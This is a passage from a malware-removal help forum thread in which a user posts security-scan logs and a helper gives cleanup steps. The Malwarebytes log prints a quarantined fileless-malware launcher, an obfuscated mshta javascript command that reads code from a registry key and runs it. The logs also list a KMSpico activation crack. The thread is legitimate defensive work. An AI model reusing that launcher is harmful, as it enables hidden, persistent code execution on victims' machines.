Autodesk Material Library 2016 (HKLM-x32\...\{29A7D6EC-63C2-42FD-8143-5812ABD2923F}) (Version: 6.3.0.15 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2016 (HKLM-x32\...\{6B4CFC6E-ECB0-47FE-95D3-65C680ED0687}) (Version: 6.3.0.15 - Autodesk)
Battery Calibration (HKLM-x32\...\{634AC01E-49DB-4AD2-B87C-90D4DCC6AFA1}) (Version: 1.0.1508.1001 - Micro-Star International Co., Ltd.) Hidden
Battery Calibration (HKLM-x32\...\InstallShield_{634AC01E-49DB-4AD2-B87C-90D4DCC6AFA1}) (Version: 1.0.1508.1001 - Micro-Star International Co., Ltd.)
Boot Configure (HKLM-x32\...\{449D0FA3-CC16-4DEB-A2CE-215BE0F66C25}) (Version: 20.015.12293 - Micro-Star International Co., Ltd.)
BurnRecovery (HKLM-x32\...\{92A6B009-1343-4C44-AFB1-8849137CA3F0}) (Version: 5.0.1602.101 - Application) Hidden
BurnRecovery (HKLM-x32\...\InstallShield_{92A6B009-1343-4C44-AFB1-8849137CA3F0}) (Version: 5.0.1602.101 - Application)
CheckDevicesConfigurator (HKLM\...\{7295C6AE-52E8-4928-83C5-8102BCCABD0D}) (Version: 2.2.401 - Nahimic) Hidden
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5307.55 - CyberLink Corp.)
Dragon Gaming Center (HKLM-x32\...\{965B16C7-0778-4C45-B7D1-83A59E6FBBCB}) (Version: 1.0.1501.2801 - Micro-Star International Co., Ltd.) Hidden
Dragon Gaming Center (HKLM-x32\...\InstallShield_{965B16C7-0778-4C45-B7D1-83A59E6FBBCB}) (Version: 1.0.1501.2801 - Micro-Star International Co., Ltd.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{39AB2E37-1A55-4292-A5D3-971E9F70D0F8}) (Version: 2.1.32.0 - MAGIX AG)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 52.0.2743.116 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.31.5 - Google Inc.) Hidden
Help Desk (HKLM-x32\...\{7E8181AF-9679-49B3-B133-C265709B6927}) (Version: 1.0.1605.0601 - Micro-Star International Co., Ltd.) Hidden
Help Desk (HKLM-x32\...\InstallShield_{7E8181AF-9679-49B3-B133-C265709B6927}) (Version: 1.0.1605.0601 - Micro-Star International Co., Ltd.)
Intel® Chipset Device Software (HKLM-x32\...\{c7f54569-0018-439c-809a-48046a4d4ebc}) (Version: 10.1.1.9 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1162 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4300 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® Wireless Bluetooth® (HKLM-x32\...\{31C74FA2-2AB9-41C3-BFBE-693283E4C28B}) (Version: 17.1.1527.1534 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{795ee3a0-97fa-489a-9543-7564ccc43be4}) (Version: 18.12.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
KB9X Radio Switch Driver (HKLM\...\EC950B206B0E7722C96A318DF396BABFBB057BC0) (Version: 1.1.2.0 - ENE TECHNOLOGY INC.)
Killer Bandwidth Control Filter Driver (HKLM\...\{F1D42BC7-5A6A-463A-94F7-87DC10AF24BC}) (Version: 1.1.56.1122 - Rivet Networks) Hidden
Killer E240x Drivers (HKLM\...\{60FDE5D6-FF5D-4875-8ABF-00D17307BC30}) (Version: 1.1.56.1122 - Rivet Networks) Hidden
Killer Network Manager (HKLM\...\{DD1185A8-C3E0-4838-B6D9-07E8625220D3}) (Version: 1.1.56.1122 - Rivet Networks) Hidden
Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.56.1122 - Rivet Networks)
KMSpico v9.3.1 (HKLM\...\KMSpico_is1) (Version: 9.3.1 - )
LauncherSetup (HKLM\...\{4A5A50ED-CE5F-4D05-94F1-D5F623B2B832}) (Version: 2.2.401 - Nahimic) Hidden
Macrium Reflect Free Edition (HKLM\...\{A2C0B6E0-6132-4CE7-AED5-8615E5B4088F}) (Version: 5.3.7220 - Paramount Software (UK) Ltd.) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 5.3 - Paramount Software (UK) Ltd.)
MAGIX Content and Soundpools (HKLM-x32\...\MAGIX_GlobalContent) (Version: 1.0.0.0 - MAGIX Software GmbH)
MAGIX Music Maker Silver (HKLM\...\{CD1DE5DB-7AF2-4D01-BBB1-9AD581B34403}) (Version: 21.0.3.44 - MAGIX Software GmbH) Hidden
MAGIX Music Maker Silver (HKLM-x32\...\MX.{CD1DE5DB-7AF2-4D01-BBB1-9AD581B34403}) (Version: 21.0.3.44 - MAGIX Software GmbH)
MAGIX Music Maker Silver Soundpools (HKLM\...\{CC8B6E22-F579-46A1-A9F3-985F114590F0}) (Version: 1.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Photo Manager 15 (HKLM\...\{10FDDBB2-C9D3-4207-B3A9-4910464BA0B0}) (Version: 11.0.2.36 - MAGIX Software GmbH) Hidden
MAGIX Photo Manager 15 (HKLM-x32\...\MX.{10FDDBB2-C9D3-4207-B3A9-4910464BA0B0}) (Version: 11.0.2.36 - MAGIX Software GmbH)
Microsoft Office Standard 2013 (HKLM\...\Office15.STANDARD) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
MSI Social Media Collection (HKLM-x32\...\{7ADEC426-BE95-48EF-84D4-086BD0F4D331}) (Version: 1.14.2251 - Micro-Star International Co., Ltd.)
MSI True Color (HKLM\...\{B4A2776D-59CD-4193-A19D-DE15CB7FC5AA}) (Version: 1.6.2.930 - Portrait Displays, Inc.)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
Nahimic 2 (HKLM-x32\...\{de4c0c54-bc58-4ee0-866b-5f58d0f57751}) (Version: 2.2.4 - Nahimic)
Nahimic2UISetup (HKLM\...\{5A7E349F-2480-41FF-B683-5ACB2546CD30}) (Version: 2.2.401 - Nahimic) Hidden
NahimicSettingsConfigurator (HKLM\...\{273EAA7B-DBAD-47A7-BF38-B350ACE2E31E}) (Version: 2.2.401 - Nahimic) Hidden
Norton Online Backup (HKLM-x32\...\{652C1CDF-C61D-4525-9348-8C272CC2DB24}) (Version: 2.10.2.7 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\NARA) (Version: 4.6.0.12 - Symantec Corporation) Hidden
Norton Security (HKLM-x32\...\NS) (Version: 22.7.1.32 - Symantec Corporation)
NVIDIA GeForce Experience 2.7.4.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.7.4.10 - NVIDIA Corporation)
NVIDIA Graphics Driver 359.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 359.00 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
ProductDaemonSetup (HKLM\...\{167AF04D-CC59-482B-9FB7-5C6613F64A71}) (Version: 2.2.401 - Nahimic) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7904 - Realtek Semiconductor Corp.)
SCM (HKLM\...\{6BD35B46-C818-44B1-964A-7A9C44E1238F}) (Version: 13.016.04152 - Application)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 4.1.0240 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 2.7.4.10 - NVIDIA Corporation) Hidden
Sizing Options (HKLM-x32\...\{DFAB6DE8-E45F-4D5D-95C0-E54C58993F9F}) (Version: 3.0.1512.1801 - Application) Hidden
Sizing Options (HKLM-x32\...\InstallShield_{DFAB6DE8-E45F-4D5D-95C0-E54C58993F9F}) (Version: 3.0.1512.1801 - Application)
SketchUp 2016 (HKLM\...\{D87EE6DC-32BA-4219-AC75-0A6FD54ED058}) (Version: 16.0.19912 - Trimble Navigation Limited)
SketchUp Import 2016 (HKLM-x32\...\{C769FB7C-1F55-4B31-9A2A-21CEC50F4F92}) (Version: 2.0.0 - Autodesk)
Skype™ 7.26 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
SteelSeries Engine 3.8.4 (HKLM\...\SteelSeries Engine 3) (Version: 3.8.4 - SteelSeries ApS)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.6.1 - Synaptics Incorporated)
UIInstallUpgrade (HKLM\...\{3512FF7E-FB05-4F92-ADD1-C43F498ED2DD}) (Version: 2.2.401 - Nahimic) Hidden
WhatsApp (HKCU\...\WhatsApp) (Version: 0.2.1455 - WhatsApp)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinZip 17.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240DD}) (Version: 17.5.10562 - WinZip Computing, S.L. )
XSplit Gamecaster (HKLM-x32\...\{083E9AF8-1900-4D7A-AB08-0B4BB98D2848}) (Version: 2.7.1512.1839 - SplitmediaLabs)
迅雷9 (HKLM-x32\...\thunder_is1) (Version: 9.0.14.358 - 迅雷网络技术有限公司)
迅雷影音 (HKLM-x32\...\迅雷影音) (Version: 5.2.3.4986 - 迅雷网络技术有限公司)
迅雷看看高清播放组件 (HKLM-x32\...\迅雷看看高清播放组件) (Version: 1.0.0.171 - 迅雷网络技术有限公司)
 
**** End of log ****

 

 
LOG FROM SECURITY CHECK
 

 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Norton Security    
Windows Defender   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Google Chrome (52.0.2743.116) 
 Google Chrome (SetupMetrics...) 
````````Process Check: objlist.exe by Laurent````````  
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 
 
 
LOG FARBAR SERVICE SCANNER
 
Farbar Service Scanner Version: 27-01-2016
Ran by User (administrator) on 04-09-2016 at 15:56:05
Running from "F:\迅雷下载"
Microsoft Windows 10 Home Single Language  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Security Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Demand. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****
 
LOG FROM ADWCLEANER
 

# AdwCleaner v6.010 - Logfile created 04/09/2016 at 15:59:01
# Updated on 12/08/2016 by ToolsLib
# Database : 2016-09-03.2 [Server]
# Operating System : Windows 10 Home Single Language  (X64)
# Username : User - MSI
# Running from : F:\迅雷下载\AdwCleaner.exe
# Mode: Scan
 
 
 
***** [ Services ] *****
 
No malicious services found.
 
 
***** [ Folders ] *****
 
No malicious folders found.
 
 
***** [ Files ] *****
 
No malicious files found.
 
 
***** [ DLL ] *****
 
No malicious DLLs found.
 
 
***** [ WMI ] *****
 
No malicious keys found.
 
 
***** [ Shortcuts ] *****
 
No infected shortcut found.
 
 
***** [ Scheduled Tasks ] *****
 
Task Found:  MSISCMTsk
 
 
***** [ Registry ] *****
 
Key Found:  [x64] HKLM\SOFTWARE\Classes\CLSID\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}
Key Found:  [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}
Key Found:  HKLM\SOFTWARE\Classes\CLSID\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}
Key Found:  HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}
 
 
***** [ Web browsers ] *****
 
No malicious Firefox based browser items found.
No malicious Chromium based browser items found.
 
*************************
 
C:\AdwCleaner\AdwCleaner[S0].txt - [1337 Bytes] - [04/09/2016 15:59:01]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1410 Bytes] ##########
 
 
LOG FROM JUNKWARE REMOVAL TOOL
 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.7 (07.03.2016)
Operating System: Windows 10 Home Single Language x64 
Ran by User (Administrator) on Sun 04/09/2016 at 16:06:56.67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 1 
 
Failed to delete: C:\Users\Public\thunder network (Folder) 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sun 04/09/2016 at 16:09:31.83
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
LOG FROM MALWAREBYTES
 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 4/9/2016
Scan Time: 4:30 PM
Logfile: Malware.txt
Administrator: Yes
 
Version: 2.2.1.1043
Malware Database: v2016.09.04.04
Rootkit Database: v2016.02.08.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 10
CPU: x64
File System: NTFS
User: User
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 313980
Time Elapsed: 5 min, 49 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 9
PUP.Optional.Xunlei.BHO, HKLM\SOFTWARE\CLASSES\CLSID\{004B0726-A010-4abf-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
PUP.Optional.Xunlei.BHO, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
PUP.Optional.Xunlei.BHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
PUP.Optional.Xunlei.BHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
PUP.Optional.Xunlei.BHO, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{004B0726-A010-4ABF-8556-FCDB7F1FCA1E}, Quarantined, [1311303efe9c89adffa01f7757abcd33], 
Trojan.Agent, HKLM\SOFTWARE\CLASSES\thunder, Quarantined, [52d2c1ad4c4e67cf15ed919def141ee2], 
Trojan.Agent, HKLM\SOFTWARE\WOW6432NODE\CLASSES\thunder, Quarantined, [5dc7521cfe9c6dc942c040ee986b51af], 
Trojan.Agent, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001_Classes\thunder, Quarantined, [51d3cf9f1e7cdc5a6d95909e798aea16], 
Rootkit.Fileless.MTGen, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001_Classes\D341B5D7\SHELL\OPEN\COMMAND, Quarantined, [52d2beb06a3046f0e1fa4db023e09c64], 
 
Registry Values: 2
Trojan.Fileless.MTGen, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^lgqcpgptl, Quarantined, [2df788e6afeb191dae318b74bd46f010], 
Rootkit.Fileless.MTGen, HKU\S-1-5-21-2116908856-3950696571-1322428135-1001_Classes\d341b5d7\SHELL\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:UY9fAm="ZGjFw";d7G0=new ActiveXObject("WScript.Shell");SdIvcL68="mTuq";TDE2B=d7G0.RegRead("HKCU\\software\\pgdzul\\dexpufdr");og2ADn="4Y";eval(TDE2B);bLmjx2="upxpoUh";", Quarantined, [52d2beb06a3046f0e1fa4db023e09c64]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 1
Rootkit.Fileless.MTGen, C:\Users\User\AppData\Local\fffd3a4e\1bf012f4.bat, Quarantined, [042092dc3565171feb80c9d447bdd828], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
 


#7 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:22 PM

Posted 04 September 2016 - 04:21 AM

Hi HonSern

 

2hrmr9e.jpg  Please download rKill to your desktop.

  • Right click the file > Run As Administrator.
  • If you have any difficulty running the the tool please use an alternative from this page
  • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully
  • When the scan is done Notepad will open with rKill log

Then, please run a scan with Windows Defender.

 

without restarting... (if you do restart please run rKill again)

 

51a5f31352b88-icon_MBAR.pngDownload Malwarebytes Anti-Rootkit to your desktop.

  • Warning! Malwarebytes Anti-Rootkit needs to be run from an account with administrator rights.
  • Double click on downloaded file. OK self extracting prompt.
  • MBAR will start. Click "Next" to continue.
  • Click in the following screen "Update" to obtain the latest malware definitions.
  • Once the update is complete select "Next" and click "Scan".
  • When the scan is finished and no malware has been found select "Exit".
  • If malware was detected, make sure to check all the items and click "Cleanup". Reboot your computer.
  • Open the MBAR folder located on your Desktop and paste the content of the following files in your next reply:
  • "mbar-log-{date} (xx-xx-xx).txt"
  • "system-log.txt"

Please copy and paste the logs into your reply, let me know if Defender removed anything.

 

TsVk!


Edited by TsVk!, 04 September 2016 - 04:37 AM.


#8 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:22 PM

Posted 04 September 2016 - 04:41 AM

above post updated...



#9 HonSern

HonSern
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 07:38 AM

Hi TsVk,

 

I believe with the actions that you have suggested earlier.

It has already resolve the issue that i saw

The script error is not showing anymore with one of the programs that i installed earlier removed.

It was a torrent downloader programme by a China based website

 

Nonetheless, i have done the instructions that you have said.

Hopefully it can ensure that my computer is clean now

 

Rkill Log

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
Copyright 2008-2016 BleepingComputer.com
More Information about Rkill can be found at this link:
 
Program started at: 09/04/2016 06:26:27 PM in x64 mode.
Windows Version: Windows 10 Home Single Language 
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * No malware processes found to kill.
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Windows Defender Disabled
 
   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001
 
Checking Windows Service Integrity: 
 
 * AppMgmt [Missing Service]
 * CSC [Missing Service]
 * CscService [Missing Service]
 * PeerDistSvc [Missing Service]
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * No issues found.
 
Program finished at: 09/04/2016 06:27:36 PM
Execution time: 0 hours(s), 1 minute(s), and 8 seconds(s)
 
Malware Anti-Rootkit Log
 
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2016.09.04.04
  rootkit: v2016.08.15.01
 
Windows 10 x64 NTFS
Internet Explorer 11.545.10586.0
User :: MSI [administrator]
 
4/9/2016 6:33:00 PM
mbar-log-2016-09-04 (18-33-00).txt
 
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 315970
Time elapsed: 12 minute(s), 10 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)
 
System Log
 
---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.09.3.1001
 
© Malwarebytes Corporation 2011-2012
 
OS version: 10.0.9200 Windows 10 x64
 
Account is Administrative
 
Internet Explorer version: 11.545.10586.0
 
File system is: NTFS
Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED, F:\ DRIVE_FIXED
CPU speed: 2.592000 GHz
Memory total: 12754694144, free: 8167759872
 
Downloaded database version: v2016.09.04.04
Downloaded database version: v2016.08.15.01
Downloaded database version: v2016.08.31.01
=======================================
Initializing...
Driver version: 0.3.0.4
------------ Kernel report ------------
     09/04/2016 18:32:51
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kd.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
\SystemRoot\System32\drivers\werkernel.sys
\SystemRoot\System32\drivers\CLFS.SYS
\SystemRoot\System32\drivers\tm.sys
\SystemRoot\system32\PSHED.dll
\SystemRoot\system32\BOOTVID.dll
\SystemRoot\System32\drivers\cmimcext.sys
\SystemRoot\System32\drivers\ntosext.sys
\SystemRoot\system32\CI.dll
\SystemRoot\System32\drivers\msrpc.sys
\SystemRoot\System32\drivers\FLTMGR.SYS
\SystemRoot\System32\drivers\ksecdd.sys
\SystemRoot\System32\drivers\clipsp.sys
\SystemRoot\system32\drivers\Wdf01000.sys
\SystemRoot\system32\drivers\WDFLDR.SYS
\SystemRoot\System32\Drivers\acpiex.sys
\SystemRoot\System32\Drivers\WppRecorder.sys
\SystemRoot\System32\Drivers\cng.sys
\SystemRoot\System32\drivers\ACPI.sys
\SystemRoot\System32\drivers\WMILIB.SYS
\SystemRoot\system32\drivers\WindowsTrustedRT.sys
\SystemRoot\System32\drivers\WindowsTrustedRTProxy.sys
\SystemRoot\System32\drivers\pcw.sys
\SystemRoot\System32\drivers\msisadrv.sys
\SystemRoot\System32\drivers\pci.sys
\SystemRoot\System32\drivers\vdrvroot.sys
\SystemRoot\system32\drivers\pdc.sys
\SystemRoot\system32\drivers\CEA.sys
\SystemRoot\System32\drivers\partmgr.sys
\SystemRoot\System32\drivers\spaceport.sys
\SystemRoot\System32\drivers\volmgr.sys
\SystemRoot\System32\drivers\volmgrx.sys
\SystemRoot\System32\drivers\mountmgr.sys
\SystemRoot\System32\drivers\iaStorA.sys
\SystemRoot\System32\drivers\storport.sys
\SystemRoot\System32\drivers\EhStorClass.sys
\SystemRoot\System32\drivers\fileinfo.sys
\SystemRoot\System32\Drivers\Wof.sys
\SystemRoot\System32\Drivers\NTFS.sys
\SystemRoot\System32\Drivers\Fs_Rec.sys
\SystemRoot\system32\drivers\ndis.sys
\SystemRoot\system32\drivers\NETIO.SYS
\SystemRoot\System32\Drivers\ksecpkg.sys
\SystemRoot\System32\drivers\tcpip.sys
\SystemRoot\System32\drivers\fwpkclnt.sys
\SystemRoot\System32\drivers\wfplwfs.sys
\SystemRoot\system32\drivers\NSx64\1607010.020\SYMEFASI64.SYS
